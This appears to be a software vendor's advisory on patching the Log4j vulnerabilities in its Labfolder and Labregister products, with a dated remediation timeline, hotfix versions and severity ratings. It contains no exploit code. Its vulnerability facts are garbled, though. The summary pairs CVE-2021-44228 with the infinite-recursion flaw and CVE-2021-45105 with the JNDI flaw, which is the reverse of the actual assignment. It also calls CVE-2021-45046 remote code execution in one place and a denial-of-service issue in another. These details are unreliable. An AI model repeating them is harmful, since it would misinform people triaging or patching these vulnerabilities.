2021-12 Security update

How Can We Help?

2021-12 Security update

Created On
Last Updated On
Print
← All Topics

Our commitment to Security and Privacy

Labforward is committed to achieving and maintaining the trust of our customers. Integral to this mission is that we always strive to provide robust security procedures and strictly adhere to the GDPR and our Privacy Policy. You can refer to our policy regarding security update disclosures here.

Summary

Labforward released several security updates for Labfolder and Labregister. These patches contain updates to the open-source logging tool Apache Log4j as recommended by the Apache Software Foundation. Applying these patches mitigate the vulnerabilities documented in:
  1. CVE-2021-44228: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation.
  2. CVE-2021-45046: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
  3. CVE-2021-45105: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.

Timeline of issue handling

  • December 11th 2021
    • CVE-2021-44228 was escalated internally and immediately investigated by our engineering team.
    • Initial classification of Severity = Critical and Exploitability = Exploitation More Likely. Base CVSS Score: 10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    • We confirmed that Labfolder and Labregister use the open-source logging tool Log4j and that therefore we needed to take immediate action. Laboperator was not affected.
    • Recommended immediate mitigation step of disabling JNDI lookups was applied to our Cloud environments within 3 hours of the issue being escalated.
    • Later that evening, we informed all IT administrators of our On-Premises customers of the issue and requested that they apply the same mitigation steps as soon as possible. We also informed them that we will release a hotfix to upgrade the library.
  • December 12th 2021
    • Hotfix v2.12.1 upgrade Log4j to v2.15.0 released to our Cloud server.
    • Hotfix v2.11.2 upgrade Log4j to v2.15.0 released to On-Premises customers, installation instructions sent to IT administrators and marked as mandatory and urgent.
  • December 13th 2021
    • Further support of On-Premises customers upon request.
    • Further analysis of application logs show with a high degree of confidence that no credible or successful attack on Labfolder / Labregister cloud application servers was made.
  • December 15th 2021
    • CVE-2021-45046 was escalated internally and immediately investigated by our engineering team.
    • Internal investigation shows that the Labfolder & Labregister codebase are highly unlikely to be vulnerable to this type of DOS attack, however we followed the recommended mitigation path to upgrade Log4j to v2.16.0.
    • Hotfix v2.12.2 upgrade Log4j to v2.16.0 released to our Cloud server
    • Hotfix v2.11.3 upgrade Log4j to v2.16.0 released to On-Premises customers, installation instructions sent to IT administrators and marked as recommended.
  • December 20th 2021
    • CVE-2021-45105 was escalated internally and immediately investigated by our engineering team.
    • Internal investigation shows that the Labfolder & Labregister codebase are highly unlikely to be vulnerable, however we followed the recommended mitigation path to upgrade Log4j to v2.17.0.
    • Hotfix v2.12.4 upgrade Log4j to v2.17.0 released to our Cloud server
    • Hotfix v2.11.4 upgrade Log4j to v2.17.0 released to On-Premises customers, installation instructions sent to IT administrators and marked as recommended.
  • December 30th 2021 – Publication of this Security Update

Severity = What is the worst theoretical outcome?

Rating Description
Critical The vulnerability, when exploited, results in remote code execution on the vulnerable server with system-level privileges. As a result, it is rated at the highest possible severity level.

Exploitability = What is the likelihood that a vulnerability addressed in a security update will be exploited?

Rating Description
Exploitation More Likely Analysis by security researchers has shown that exploit code could be created in such a way that an attacker could consistently exploit this vulnerability. Moreover, since public disclosure of this vulnerability has been made, there have been several well-published instances of this type of vulnerability being exploited in other software. Log4j is widely used by both enterprise apps and cloud services, as it is included in popular java frameworks such as Apache Flink, Apache Druid, Apache Struct2 etc. This makes it an attractive target for attackers, and therefore more likely that exploits could be created. As such, Labforward and also its On-Premises customers of Labfolder should treat this with a higher priority.

General Recommendations

  • All users should always use the latest version of our recommended browsers (Chrome, Firefox, Edge and Safari). In addition, make sure to always update your operating system to the latest version, and have antivirus software in place to protect your devices and data.
  • IT admins of our On-Premises customers should update their systems as quickly as practical, especially when a new release includes a security patch.
  • IT admins of our On-Premises customers should keep the operating system and all components (i.e. Docker) of their on-prem servers up to date.
  • While our classification system is intended to provide a broadly objective assessment of each issue, we strongly encourage customers to evaluate their own environments and make decisions about which updates are required to protect their systems.
Tags: